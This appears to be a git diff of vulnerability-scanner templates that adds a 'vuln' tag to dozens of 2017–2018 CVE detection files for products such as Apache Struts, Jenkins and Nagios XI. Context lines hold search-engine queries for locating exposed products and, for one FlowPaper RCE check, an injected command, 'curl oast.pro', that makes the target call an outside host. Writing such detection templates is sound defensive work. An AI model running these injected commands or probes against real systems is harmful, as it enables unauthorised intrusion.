@@ -39,7 +39,7 @@ info: - title="struts2 showcase" - body="apache struts" google-query: intitle:"struts2 showcase" - tags: cve2017,cve,apache,kev,msf,struts,rce,vkev + tags: cve2017,cve,apache,kev,msf,struts,rce,vkev,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml index 0bed4d1fa0e..59269bcaf42 100644 --- a/http/cves/2017/CVE-2017-5689.yaml +++ b/http/cves/2017/CVE-2017-5689.yaml @@ -33,7 +33,7 @@ info: - http.title:"active management technology" fofa-query: title="active management technology" google-query: intitle:"active management technology" - tags: cve2017,cve,amt,intel,tenable,kev,vkev + tags: cve2017,cve,amt,intel,tenable,kev,vkev,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-5868.yaml b/http/cves/2017/CVE-2017-5868.yaml index b0ea9750f11..feece9a05b6 100644 --- a/http/cves/2017/CVE-2017-5868.yaml +++ b/http/cves/2017/CVE-2017-5868.yaml @@ -23,7 +23,7 @@ info: vendor: openvpn product: openvpn_access_server shodan-query: cpe:"cpe:2.3:a:openvpn:openvpn_access_server" - tags: cve,cve2017,openvpn,crlf + tags: cve,cve2017,openvpn,crlf,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-5871.yaml b/http/cves/2017/CVE-2017-5871.yaml index 81abe42efea..e0f02b07920 100644 --- a/http/cves/2017/CVE-2017-5871.yaml +++ b/http/cves/2017/CVE-2017-5871.yaml @@ -27,7 +27,7 @@ info: shodan-query: title:"Odoo" product: odoo vendor: odoo - tags: cve2017,cve,odoo,redirect + tags: cve2017,cve,odoo,redirect,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-5982.yaml b/http/cves/2017/CVE-2017-5982.yaml index eee781ac28f..26044970e7d 100644 --- a/http/cves/2017/CVE-2017-5982.yaml +++ b/http/cves/2017/CVE-2017-5982.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: kodi product: kodi - tags: cve2017,cve,kodi,lfi,edb + tags: cve2017,cve,kodi,lfi,edb,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml index 24c2afb01ab..420d1e1780f 100644 --- a/http/cves/2017/CVE-2017-6090.yaml +++ b/http/cves/2017/CVE-2017-6090.yaml @@ -32,7 +32,7 @@ info: - http.title:"phpcollab" fofa-query: title="phpcollab" google-query: intitle:"phpcollab" - tags: cve,cve2017,phpcollab,rce,fileupload,edb,intrusive,vkev + tags: cve,cve2017,phpcollab,rce,fileupload,edb,intrusive,vkev,vuln variables: string: "CVE-2017-6090" diff --git a/http/cves/2017/CVE-2017-7269.yaml b/http/cves/2017/CVE-2017-7269.yaml index a0c2c86e93c..51346c95184 100644 --- a/http/cves/2017/CVE-2017-7269.yaml +++ b/http/cves/2017/CVE-2017-7269.yaml @@ -29,7 +29,7 @@ info: vendor: microsoft product: internet_information_server shodan-query: cpe:"cpe:2.3:a:microsoft:internet_information_server" - tags: cve2017,cve,rce,windows,iis,kev,microsoft,vkev + tags: cve2017,cve,rce,windows,iis,kev,microsoft,vkev,vuln http: - method: OPTIONS diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml index 7bde1d0b58b..609d43248b2 100644 --- a/http/cves/2017/CVE-2017-7391.yaml +++ b/http/cves/2017/CVE-2017-7391.yaml @@ -28,7 +28,7 @@ info: vendor: magmi_project product: magmi shodan-query: http.component:"magento" - tags: cve2017,cve,magmi,xss,magmi_project,vkev + tags: cve2017,cve,magmi,xss,magmi_project,vkev,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-7615.yaml b/http/cves/2017/CVE-2017-7615.yaml index 8f325419b10..ff7aab43fcb 100644 --- a/http/cves/2017/CVE-2017-7615.yaml +++ b/http/cves/2017/CVE-2017-7615.yaml @@ -36,7 +36,7 @@ info: - http.favicon.hash:662709064 - cpe:"cpe:2.3:a:mantisbt:mantisbt" fofa-query: icon_hash=662709064 - tags: cve,cve2017,mantisbt,unauth,edb + tags: cve,cve2017,mantisbt,unauth,edb,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-7855.yaml b/http/cves/2017/CVE-2017-7855.yaml index 1d0ff44082a..bbcddb4bebc 100644 --- a/http/cves/2017/CVE-2017-7855.yaml +++ b/http/cves/2017/CVE-2017-7855.yaml @@ -28,7 +28,7 @@ info: - http.title:"gotify" fofa-query: title="gotify" google-query: intitle:"gotify" - tags: cve,cve2017,xss,icewarp + tags: cve,cve2017,xss,icewarp,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-7921.yaml b/http/cves/2017/CVE-2017-7921.yaml index 2a294ffd29d..23673621f11 100644 --- a/http/cves/2017/CVE-2017-7921.yaml +++ b/http/cves/2017/CVE-2017-7921.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: hikvision product: ds-2cd2032-i_firmware - tags: cve,cve2017,auth-bypass,hikvision,vkev + tags: cve,cve2017,auth-bypass,hikvision,vkev,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-7925.yaml b/http/cves/2017/CVE-2017-7925.yaml index 897d54d344a..68d37b43197 100644 --- a/http/cves/2017/CVE-2017-7925.yaml +++ b/http/cves/2017/CVE-2017-7925.yaml @@ -28,7 +28,7 @@ info: product: dh-ipc-hdbw23a0rn-zs_firmware shodan-query: http.favicon.hash:2019488876 fofa-query: icon_hash=2019488876 - tags: cve,cve2017,dahua,camera,dahuasecurity + tags: cve,cve2017,dahua,camera,dahuasecurity,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-8046.yaml b/http/cves/2017/CVE-2017-8046.yaml index 3abe7e5efe1..14e28e42a7b 100644 --- a/http/cves/2017/CVE-2017-8046.yaml +++ b/http/cves/2017/CVE-2017-8046.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"eureka" fofa-query: title="eureka" google-query: intitle:"eureka" - tags: cve,cve2017,pivotal,springboot,pivotal_software,vkev + tags: cve,cve2017,pivotal,springboot,pivotal_software,vkev,vuln flow: | http(1) set("endpoint", iterate(template.endpoint)[0]) diff --git a/http/cves/2017/CVE-2017-8229.yaml b/http/cves/2017/CVE-2017-8229.yaml index ec509a53628..e18a3ce7932 100644 --- a/http/cves/2017/CVE-2017-8229.yaml +++ b/http/cves/2017/CVE-2017-8229.yaml @@ -36,7 +36,7 @@ info: - "Amcrest" - amcrest - body="amcrest" - tags: cve2017,cve,packetstorm,seclists,amcrest,iot + tags: cve2017,cve,packetstorm,seclists,amcrest,iot,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-8917.yaml b/http/cves/2017/CVE-2017-8917.yaml index 615e6da492a..c0e89c533da 100644 --- a/http/cves/2017/CVE-2017-8917.yaml +++ b/http/cves/2017/CVE-2017-8917.yaml @@ -35,7 +35,7 @@ info: - http.component:"joomla" - cpe:"cpe:2.3:a:joomla:joomla\!" fofa-query: body="joomla! - open source content management" - tags: cve2017,cve,joomla,sqli + tags: cve2017,cve,joomla,sqli,vuln variables: num: "999999999" diff --git a/http/cves/2017/CVE-2017-9140.yaml b/http/cves/2017/CVE-2017-9140.yaml index 335e00326d0..5c3b18f0e5c 100644 --- a/http/cves/2017/CVE-2017-9140.yaml +++ b/http/cves/2017/CVE-2017-9140.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: progress product: telerik_reporting - tags: cve2017,cve,xss,telerik,progress + tags: cve2017,cve,xss,telerik,progress,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml index 2088f82ebba..8d83b798904 100644 --- a/http/cves/2017/CVE-2017-9288.yaml +++ b/http/cves/2017/CVE-2017-9288.yaml @@ -28,7 +28,7 @@ info: vendor: raygun product: raygun4wp framework: wordpress - tags: cve2017,cve,wordpress,xss,wp-plugin,raygun + tags: cve2017,cve,wordpress,xss,wp-plugin,raygun,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml index 5610ea3353e..cef878eedec 100644 --- a/http/cves/2017/CVE-2017-9416.yaml +++ b/http/cves/2017/CVE-2017-9416.yaml @@ -31,7 +31,7 @@ info: - http.title:"odoo" fofa-query: title="odoo" google-query: intitle:"odoo" - tags: cve2017,cve,odoo,lfi + tags: cve2017,cve,odoo,lfi,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml index fbde030c6b7..e32450f8f34 100644 --- a/http/cves/2017/CVE-2017-9506.yaml +++ b/http/cves/2017/CVE-2017-9506.yaml @@ -30,7 +30,7 @@ info: shodan-query: - http.component:"Atlassian Jira" - http.component:"atlassian jira" - tags: cve,cve2017,atlassian,jira,ssrf,oast,vkev + tags: cve,cve2017,atlassian,jira,ssrf,oast,vkev,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-9791.yaml b/http/cves/2017/CVE-2017-9791.yaml index 8cd65ba9ab0..41ae303eb6d 100644 --- a/http/cves/2017/CVE-2017-9791.yaml +++ b/http/cves/2017/CVE-2017-9791.yaml @@ -40,7 +40,7 @@ info: - body="apache struts" - body="struts problem report" google-query: intitle:"struts2 showcase" - tags: cve2017,cve,apache,rce,struts,kev,vkev + tags: cve2017,cve,apache,rce,struts,kev,vkev,vuln variables: num1: "{{rand_int(40000, 44800)}}" num2: "{{rand_int(40000, 44800)}}" diff --git a/http/cves/2017/CVE-2017-9805.yaml b/http/cves/2017/CVE-2017-9805.yaml index ea66a4e0b0d..a549c583f77 100644 --- a/http/cves/2017/CVE-2017-9805.yaml +++ b/http/cves/2017/CVE-2017-9805.yaml @@ -36,7 +36,7 @@ info: - title="struts2 showcase" - body="apache struts" google-query: intitle:"struts2 showcase" - tags: cve,cve2017,apache,rce,struts,kev,vkev + tags: cve,cve2017,apache,rce,struts,kev,vkev,vuln http: - method: POST diff --git a/http/cves/2017/CVE-2017-9822.yaml b/http/cves/2017/CVE-2017-9822.yaml index ccc80dccdc7..ec0bf27b999 100644 --- a/http/cves/2017/CVE-2017-9822.yaml +++ b/http/cves/2017/CVE-2017-9822.yaml @@ -28,7 +28,7 @@ info: vendor: dnnsoftware product: dotnetnuke fofa-query: app="dotnetnuke" - tags: cve2017,cve,packetstorm,dotnetnuke,bypass,rce,deserialization,kev,dnnsoftware,vkev + tags: cve2017,cve,packetstorm,dotnetnuke,bypass,rce,deserialization,kev,dnnsoftware,vkev,vuln http: - raw: diff --git a/http/cves/2017/CVE-2017-9833.yaml b/http/cves/2017/CVE-2017-9833.yaml index 2d6a33e7c5a..68c9167ca13 100644 --- a/http/cves/2017/CVE-2017-9833.yaml +++ b/http/cves/2017/CVE-2017-9833.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: boa product: boa - tags: cve,cve2017,boa,lfr,lfi,edb,vkev + tags: cve,cve2017,boa,lfr,lfi,edb,vkev,vuln http: - method: GET diff --git a/http/cves/2017/CVE-2017-9841.yaml b/http/cves/2017/CVE-2017-9841.yaml index 7acaa352161..9650f9059a3 100644 --- a/http/cves/2017/CVE-2017-9841.yaml +++ b/http/cves/2017/CVE-2017-9841.yaml @@ -25,7 +25,7 @@ info: max-request: 6 vendor: phpunit_project product: phpunit - tags: cve2017,cve,php,phpunit,rce,kev,phpunit_project,vkev + tags: cve2017,cve,php,phpunit,rce,kev,phpunit_project,vkev,vuln variables: string: "CVE-2017-9841" diff --git a/http/cves/2017/CVE-2017-9965.yaml b/http/cves/2017/CVE-2017-9965.yaml index a9695b2cd15..7fcf0019a69 100644 --- a/http/cves/2017/CVE-2017-9965.yaml +++ b/http/cves/2017/CVE-2017-9965.yaml @@ -25,7 +25,7 @@ info: vendor: schneider-electric product: pelco_videoxpert shodan-query: title:"VideoXpert" - tags: cve,cve2017,schneider,pelco,packetstorm,lfi,videoxpert + tags: cve,cve2017,schneider,pelco,packetstorm,lfi,videoxpert,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml index 04d8bbb2fb7..71495055938 100644 --- a/http/cves/2018/CVE-2018-0127.yaml +++ b/http/cves/2018/CVE-2018-0127.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: cisco product: rv132w_firmware - tags: cve,cve2018,cisco,router,vkev + tags: cve,cve2018,cisco,router,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-0296.yaml b/http/cves/2018/CVE-2018-0296.yaml index 190ef1f86f0..eaf75cdb454 100644 --- a/http/cves/2018/CVE-2018-0296.yaml +++ b/http/cves/2018/CVE-2018-0296.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: cisco product: adaptive_security_appliance_software - tags: cve2018,cve,edb,cisco,lfi,traversal,asa,kev,vkev + tags: cve2018,cve,edb,cisco,lfi,traversal,asa,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml index f12044bcd97..1474bfa31a2 100644 --- a/http/cves/2018/CVE-2018-1000129.yaml +++ b/http/cves/2018/CVE-2018-1000129.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: jolokia product: jolokia - tags: cve2018,cve,jolokia,xss + tags: cve2018,cve,jolokia,xss,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml index 1afcba06738..2af9c573b9e 100644 --- a/http/cves/2018/CVE-2018-1000130.yaml +++ b/http/cves/2018/CVE-2018-1000130.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: jolokia product: webarchive_agent - tags: cve2018,cve,jolokia,rce,jndi,proxy,vkev + tags: cve2018,cve,jolokia,rce,jndi,proxy,vkev,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml index 1379703dd79..a45dd2a871a 100644 --- a/http/cves/2018/CVE-2018-1000226.yaml +++ b/http/cves/2018/CVE-2018-1000226.yaml @@ -27,7 +27,7 @@ info: shodan-query: http.title:"cobbler web interface" fofa-query: title="cobbler web interface" google-query: intitle:"cobbler web interface" - tags: cve2018,cve,cobbler,auth-bypass,cobblerd + tags: cve2018,cve,cobbler,auth-bypass,cobblerd,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-1000533.yaml b/http/cves/2018/CVE-2018-1000533.yaml index aad14f0c63f..48e7160dcca 100644 --- a/http/cves/2018/CVE-2018-1000533.yaml +++ b/http/cves/2018/CVE-2018-1000533.yaml @@ -28,7 +28,7 @@ info: vendor: gitlist product: gitlist shodan-query: cpe:"cpe:2.3:a:gitlist:gitlist" - tags: cve,cve2018,git,gitlist,vulhub,rce + tags: cve,cve2018,git,gitlist,vulhub,rce,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-1000600.yaml b/http/cves/2018/CVE-2018-1000600.yaml index 4ca7a0791b2..b1fad8bc547 100644 --- a/http/cves/2018/CVE-2018-1000600.yaml +++ b/http/cves/2018/CVE-2018-1000600.yaml @@ -29,7 +29,7 @@ info: vendor: jenkins product: github framework: jenkins - tags: cve,cve2018,jenkins,ssrf,oast,github,vkev + tags: cve,cve2018,jenkins,ssrf,oast,github,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml index 80508ae3d23..c06cfe4977d 100644 --- a/http/cves/2018/CVE-2018-1000671.yaml +++ b/http/cves/2018/CVE-2018-1000671.yaml @@ -30,7 +30,7 @@ info: product: sympa shodan-query: http.html:"sympa" fofa-query: body="sympa" - tags: cve,cve2018,redirect,sympa,debian + tags: cve,cve2018,redirect,sympa,debian,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml index 67d017d6dc1..853937e158d 100644 --- a/http/cves/2018/CVE-2018-1000856.yaml +++ b/http/cves/2018/CVE-2018-1000856.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: domainmod product: domainmod - tags: cve2018,cve,domainmod,xss,authenticated + tags: cve2018,cve,domainmod,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml index f2d7c1fb21f..ddd8f052087 100644 --- a/http/cves/2018/CVE-2018-1000861.yaml +++ b/http/cves/2018/CVE-2018-1000861.yaml @@ -32,7 +32,7 @@ info: - cpe:"cpe:2.3:a:jenkins:jenkins" - product:"jenkins" fofa-query: icon_hash=81586312 - tags: cve2018,cve,packetstorm,kev,vulhub,rce,jenkins,vkev + tags: cve2018,cve,packetstorm,kev,vulhub,rce,jenkins,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-10088.yaml b/http/cves/2018/CVE-2018-10088.yaml index 491a5f4152d..5287423960e 100644 --- a/http/cves/2018/CVE-2018-10088.yaml +++ b/http/cves/2018/CVE-2018-10088.yaml @@ -29,7 +29,7 @@ info: vendor: xiongmaitech product: uc-httpd shodan-query: cpe:"cpe:2.3:a:xiongmaitech:uc-httpd" - tags: cve,cve2018,xiongmai,buffer-overflow,rce,passive,vkev + tags: cve,cve2018,xiongmai,buffer-overflow,rce,passive,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-10093.yaml b/http/cves/2018/CVE-2018-10093.yaml index 2286fd578f6..a46b0f4c9c4 100644 --- a/http/cves/2018/CVE-2018-10093.yaml +++ b/http/cves/2018/CVE-2018-10093.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: audiocodes product: 420hd_ip_phone_firmware - tags: cve,cve2018,rce,iot,audiocode,edb,seclists,audiocodes + tags: cve,cve2018,rce,iot,audiocode,edb,seclists,audiocodes,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-10095.yaml b/http/cves/2018/CVE-2018-10095.yaml index 7622630e455..c510d58eb67 100644 --- a/http/cves/2018/CVE-2018-10095.yaml +++ b/http/cves/2018/CVE-2018-10095.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: dolibarr product: dolibarr - tags: cve2018,cve,xss,dolibarr + tags: cve2018,cve,xss,dolibarr,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index b7d0a870ea3..f28904a80a8 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -30,7 +30,7 @@ info: - http.favicon.hash:"-631559155" - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" fofa-query: icon_hash="-631559155" - tags: cve,cve2018,panos,vpn,globalprotect,xss,paloaltonetworks + tags: cve,cve2018,panos,vpn,globalprotect,xss,paloaltonetworks,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-10201.yaml b/http/cves/2018/CVE-2018-10201.yaml index f1d0f1eaa43..b8d844f9586 100644 --- a/http/cves/2018/CVE-2018-10201.yaml +++ b/http/cves/2018/CVE-2018-10201.yaml @@ -27,7 +27,7 @@ info: max-request: 4 vendor: ncomputing product: vspace_pro - tags: cve,cve2018,ncomputing,lfi,packetstorm + tags: cve,cve2018,ncomputing,lfi,packetstorm,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index 0ade5c75407..e5f8e381230 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -28,7 +28,7 @@ info: vendor: zend product: zend_server shodan-query: cpe:"cpe:2.3:a:zend:zend_server" - tags: cve,cve2018,xss,zend + tags: cve,cve2018,xss,zend,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-10383.yaml b/http/cves/2018/CVE-2018-10383.yaml index c0ba75954f9..0607a252d10 100644 --- a/http/cves/2018/CVE-2018-10383.yaml +++ b/http/cves/2018/CVE-2018-10383.yaml @@ -24,7 +24,7 @@ info: product: securelinx_spider_firmware shodan-query: title:"Lantronix" fofa-query: title="Lantronix" - tags: cve,cve2022,lantronix,securelinx,sls,xss + tags: cve,cve2022,lantronix,securelinx,sls,xss,vuln flow: http(1) && http(2) diff --git a/http/cves/2018/CVE-2018-10562.yaml b/http/cves/2018/CVE-2018-10562.yaml index d89bfc0d55d..9c844d2d905 100644 --- a/http/cves/2018/CVE-2018-10562.yaml +++ b/http/cves/2018/CVE-2018-10562.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: dasannetworks product: gpon_router_firmware - tags: cve,cve2018,dasan,gpon,rce,oast,kev,dasannetworks,vkev + tags: cve,cve2018,dasan,gpon,rce,oast,kev,dasannetworks,vkev,vuln variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2018/CVE-2018-10735.yaml b/http/cves/2018/CVE-2018-10735.yaml index ddac6036d26..464ee9036ca 100644 --- a/http/cves/2018/CVE-2018-10735.yaml +++ b/http/cves/2018/CVE-2018-10735.yaml @@ -28,7 +28,7 @@ info: - title="nagios xi" - app="nagios-xi" google-query: intitle:"nagios xi" - tags: cve,cve2018,nagios,sqli + tags: cve,cve2018,nagios,sqli,vuln variables: num: "{{rand_int(2000000000, 2100000000)}}" diff --git a/http/cves/2018/CVE-2018-10736.yaml b/http/cves/2018/CVE-2018-10736.yaml index 93e6ab53c1a..5711deb92a5 100644 --- a/http/cves/2018/CVE-2018-10736.yaml +++ b/http/cves/2018/CVE-2018-10736.yaml @@ -29,7 +29,7 @@ info: - title="nagios xi" - app="nagios-xi" google-query: intitle:"nagios xi" - tags: cve,cve2018,nagios,sqli + tags: cve,cve2018,nagios,sqli,vuln variables: num: "{{rand_int(2000000000, 2100000000)}}" diff --git a/http/cves/2018/CVE-2018-10737.yaml b/http/cves/2018/CVE-2018-10737.yaml index b63968435a5..2ef0bf08d58 100644 --- a/http/cves/2018/CVE-2018-10737.yaml +++ b/http/cves/2018/CVE-2018-10737.yaml @@ -28,7 +28,7 @@ info: - title="nagios xi" - app="nagios-xi" google-query: intitle:"nagios xi" - tags: cve,cve2018,nagios,sqli,vkev + tags: cve,cve2018,nagios,sqli,vkev,vuln variables: num: "{{rand_int(2000000000, 2100000000)}}" diff --git a/http/cves/2018/CVE-2018-10738.yaml b/http/cves/2018/CVE-2018-10738.yaml index 5b93acb68b3..a500b6e6e38 100644 --- a/http/cves/2018/CVE-2018-10738.yaml +++ b/http/cves/2018/CVE-2018-10738.yaml @@ -28,7 +28,7 @@ info: - title="nagios xi" - app="nagios-xi" google-query: intitle:"nagios xi" - tags: cve,cve2018,nagios,sqli + tags: cve,cve2018,nagios,sqli,vuln variables: num: "{{rand_int(2000000000, 2100000000)}}" diff --git a/http/cves/2018/CVE-2018-10818.yaml b/http/cves/2018/CVE-2018-10818.yaml index d2084c1b679..f36c899712b 100644 --- a/http/cves/2018/CVE-2018-10818.yaml +++ b/http/cves/2018/CVE-2018-10818.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-10818 metadata: max-request: 2 - tags: cve,cve2018,lg-nas,rce,oast,injection + tags: cve,cve2018,lg-nas,rce,oast,injection,vuln variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2018/CVE-2018-10822.yaml b/http/cves/2018/CVE-2018-10822.yaml index 0039172dcb8..ce7e22f5eef 100644 --- a/http/cves/2018/CVE-2018-10822.yaml +++ b/http/cves/2018/CVE-2018-10822.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: dlink product: dwr-116_firmware - tags: cve2018,cve,dlink,edb,seclists,lfi,router + tags: cve2018,cve,dlink,edb,seclists,lfi,router,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-10823.yaml b/http/cves/2018/CVE-2018-10823.yaml index 54769ce3b27..5d911426f84 100644 --- a/http/cves/2018/CVE-2018-10823.yaml +++ b/http/cves/2018/CVE-2018-10823.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: dlink product: dwr-116_firmware - tags: cve,cve2018,rce,iot,dlink,router,edb,seclists,vkev + tags: cve,cve2018,rce,iot,dlink,router,edb,seclists,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-10942.yaml b/http/cves/2018/CVE-2018-10942.yaml index 8567cf4b914..2d261d4ea56 100644 --- a/http/cves/2018/CVE-2018-10942.yaml +++ b/http/cves/2018/CVE-2018-10942.yaml @@ -23,7 +23,7 @@ info: vendor: attribute_wizard_project product: attribute_wizard framework: prestashop - tags: prestashop,attributewizardpro,intrusive,file-upload,cve2018,cve,attribute_wizard_project,vkev + tags: prestashop,attributewizardpro,intrusive,file-upload,cve2018,cve,attribute_wizard_project,vkev,vuln variables: filename: '{{rand_base(7, "abc")}}' diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml index 69ad721b11f..8de469226ca 100644 --- a/http/cves/2018/CVE-2018-10956.yaml +++ b/http/cves/2018/CVE-2018-10956.yaml @@ -33,7 +33,7 @@ info: - http.title:"orchid core vms" fofa-query: title="orchid core vms" google-query: intitle:"orchid core vms" - tags: cve2018,cve,orchid,vms,lfi,edb,ipconfigure + tags: cve2018,cve,orchid,vms,lfi,edb,ipconfigure,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-11133.yaml b/http/cves/2018/CVE-2018-11133.yaml index 3e5bdf75d94..eb47eeb0d2e 100644 --- a/http/cves/2018/CVE-2018-11133.yaml +++ b/http/cves/2018/CVE-2018-11133.yaml @@ -23,7 +23,7 @@ info: vendor: quest product: kace_system_management_appliance shodan-query: title:"KACE Systems Management" - tags: cve,cve2018,xss,quest,kace,sma + tags: cve,cve2018,xss,quest,kace,sma,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-11138.yaml b/http/cves/2018/CVE-2018-11138.yaml index 97970dece14..06e1f567dad 100644 --- a/http/cves/2018/CVE-2018-11138.yaml +++ b/http/cves/2018/CVE-2018-11138.yaml @@ -29,7 +29,7 @@ info: vendor: quest product: kace_system_management_appliance fofa-query: icon_hash="-463230636" - tags: cve,cve2018,quest,kace,rce,kev,passive,vkev + tags: cve,cve2018,quest,kace,rce,kev,passive,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-11222.yaml b/http/cves/2018/CVE-2018-11222.yaml index e5f178f049d..730a635998a 100644 --- a/http/cves/2018/CVE-2018-11222.yaml +++ b/http/cves/2018/CVE-2018-11222.yaml @@ -30,7 +30,7 @@ info: - body="pandora fms - installation wizard" - title="pandora fms" google-query: intitle:"pandora fms" - tags: cve,cve2018,rce,file-upload,lfi,pandora,intrusive,vkev + tags: cve,cve2018,rce,file-upload,lfi,pandora,intrusive,vkev,vuln variables: marker: "{{randstr}}" diff --git a/http/cves/2018/CVE-2018-11227.yaml b/http/cves/2018/CVE-2018-11227.yaml index 12ddbad40df..902ccbdbf64 100644 --- a/http/cves/2018/CVE-2018-11227.yaml +++ b/http/cves/2018/CVE-2018-11227.yaml @@ -31,7 +31,7 @@ info: product: monstra_cms shodan-query: http.favicon.hash:419828698 fofa-query: icon_hash=419828698 - tags: cve,cve2018,xss,mostra,mostracms,cms,edb,monstra + tags: cve,cve2018,xss,mostra,mostracms,cms,edb,monstra,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-11231.yaml b/http/cves/2018/CVE-2018-11231.yaml index bef53bd4035..b69b767c989 100644 --- a/http/cves/2018/CVE-2018-11231.yaml +++ b/http/cves/2018/CVE-2018-11231.yaml @@ -28,7 +28,7 @@ info: vendor: divido product: divido framework: opencart - tags: cve,cve2018,opencart,sqli,intrusive,divido + tags: cve,cve2018,opencart,sqli,intrusive,divido,vuln variables: num: "999999999" diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml index 3c9dec36b19..a07fd1a79d5 100644 --- a/http/cves/2018/CVE-2018-11409.yaml +++ b/http/cves/2018/CVE-2018-11409.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"login - splunk" fofa-query: title="login - splunk" google-query: intitle:"login - splunk" - tags: cve,cve2018,edb,splunk,vkev + tags: cve,cve2018,edb,splunk,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml index 4c3e9e9d399..bc9349541f4 100644 --- a/http/cves/2018/CVE-2018-11473.yaml +++ b/http/cves/2018/CVE-2018-11473.yaml @@ -30,7 +30,7 @@ info: product: monstra shodan-query: http.favicon.hash:419828698 fofa-query: icon_hash=419828698 - tags: cve,cve2018,xss,mostra,mostracms,cms,monstra + tags: cve,cve2018,xss,mostra,mostracms,cms,monstra,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-11511.yaml b/http/cves/2018/CVE-2018-11511.yaml index b0060984286..198e1c7c4f2 100644 --- a/http/cves/2018/CVE-2018-11511.yaml +++ b/http/cves/2018/CVE-2018-11511.yaml @@ -24,7 +24,7 @@ info: product: asustor-data-master shodan-query: http.html:"ASUSTOR" fofa-query: body="ASUSTOR" && icon_hash="1678170702" - tags: cve,cve2018,asustor,adm,sqli,vkev + tags: cve,cve2018,asustor,adm,sqli,vkev,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-11686.yaml b/http/cves/2018/CVE-2018-11686.yaml index 3cd179b52a3..b28c432d369 100644 --- a/http/cves/2018/CVE-2018-11686.yaml +++ b/http/cves/2018/CVE-2018-11686.yaml @@ -23,7 +23,7 @@ info: product: flowpaper shodan-query: title:"FlexPaper" fofa-query: title="FlexPaper" - tags: cve,cve2018,flexpaper,flowpaper,rce,vkev + tags: cve,cve2018,flexpaper,flowpaper,rce,vkev,vuln variables: cmd: "curl oast.pro" diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml index 